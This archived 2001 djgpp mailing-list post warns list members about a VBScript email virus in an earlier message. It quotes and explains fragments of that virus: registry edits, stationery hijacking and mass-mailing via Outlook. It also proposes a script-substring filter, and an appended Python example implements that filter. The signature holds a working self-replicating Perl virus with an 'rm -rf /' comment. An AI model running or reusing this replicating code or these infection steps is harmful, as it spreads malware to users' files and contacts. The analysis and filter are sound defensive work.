Mail Archives: djgpp/2001/05/12/05:00:16
Javier Mendez <jmendez AT persystems DOT com> wrote:
[VBS virus]
Note to the poster:
GET A WORKING VIRUS SCANNER!!! YOU ARE INFECTED!!!
To anyone who has read the original message using Outlook or Outlook Express:
Get a working virus scanner! You might be infected.
To DJ Delorie:
Could you make your mailing list software reject postings containing JavaScript
or VBScript (these substrings may indicate this:
'JavaScript:'
'<SCRIPT'
'VBScript:'),
or could you make the software automatically remove all HTML (interpret using
Lynx or some other HTML renderer) and only post plaintext?
Analysis:
> <HTML><HEAD>
> <Title> Help </Title></HEAD>
> <Body> <script language='VBScript'>
[...]
> Rem I am sorry! happy time
May be a virus named 'happy time', I did not know it yet. But I can say what it
does:
> f1 = Rg(Ks & "Help\FileName")
It infects some Windows help thing...
> If (CInt(Cn) Mod 366) = 0 Then
> If (CInt(Second(Time)) Mod 2) = 0 Then
> Tsend
> Else
> adds = Og
> Msend (adds)
> End If
> End If
> wp = Rg("HKEY_CURRENT_USER\Control Panel\desktop\wallPaper")
writes itself as active desktop wallpaper...
> MSH = oe & "\Message Send HTML"
> CUS = oe & "\Compose Use Stationery"
> SN = oe & "\Stationery Name"
> Rw MSH, 1
> Rw CUS, 1
> Rw SN, bf
writes itself as Outlook Express stationery...
does some harmful things (did not further analyze, but searches files and
does something on them)
> Set Oo = CreateObject("Outlook.Application")
and mails itself to anyone in his mailing list.
So the poster is just infected and had djgpp AT delorie DOT com in his address book.
--
#!/usr/bin/perl -- WARNING: Be careful. This is a virus!!! # rm -rf /
eval($0=q{$0="\neval(\$0=q{$0});\n";for(<*.pl>){open X,">>$_";print X
$0;close X;}print''.reverse"\nsuriv lreP trohs rehtona tsuJ>RH<\n"});
####################### http://learn.to/quote #######################
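
The filter requested from the list software above, sketched as an added example (not part of the original posting and not the list's actual software). It decodes each text part before looking for the three substrings, because a quoted-printable body like the one quoted above can hide them from a raw-byte match. The function names and both sample messages are constructed for illustration.

```python
import email

# Substrings proposed in the posting; matched case-insensitively.
INDICATORS = ("javascript:", "<script", "vbscript:")

# Constructed sample: quoted-printable HTML whose script tag is split by a
# soft line break ("=" at end of line), so it never appears in the raw bytes.
SAMPLE_HTML = (b"From: a@example.org\nSubject: Help\nMIME-Version: 1.0\n"
               b"Content-Type: text/html; charset=iso-8859-1\n"
               b"Content-Transfer-Encoding: quoted-printable\n\n"
               b"<HTML><BODY><SC=\nRIPT language=3D'VBScript'>\n"
               b"Rem constructed sample, no payload\n</SC=\nRIPT></BODY></HTML>\n")

# Constructed sample: an ordinary plain-text posting.
SAMPLE_PLAIN = (b"From: b@example.org\nSubject: gcc question\n"
                b"Content-Type: text/plain; charset=us-ascii\n\n"
                b"How do I link against libc with djgpp?\n")

def decoded_text_parts(msg):
    """Yield (content_type, text) for each text/* part with its
    Content-Transfer-Encoding (quoted-printable, base64) undone."""
    for part in msg.walk():
        if part.get_content_maintype() != "text":
            continue
        payload = part.get_payload(decode=True) or b""
        charset = part.get_content_charset() or "latin-1"
        try:
            text = payload.decode(charset, errors="replace")
        except LookupError:  # unknown charset label in the header
            text = payload.decode("latin-1")
        yield part.get_content_type(), text

def check_posting(raw_bytes):
    """Return (accept, reasons) for one raw RFC 822 message."""
    msg = email.message_from_bytes(raw_bytes)
    reasons = []
    for ctype, text in decoded_text_parts(msg):
        lowered = text.lower()
        for needle in INDICATORS:
            if needle in lowered:
                reasons.append(f"{ctype}: contains {needle!r}")
    return (not reasons, reasons)

if __name__ == "__main__":
    for name, raw in (("html", SAMPLE_HTML), ("plain", SAMPLE_PLAIN)):
        print(name, check_posting(raw))
```
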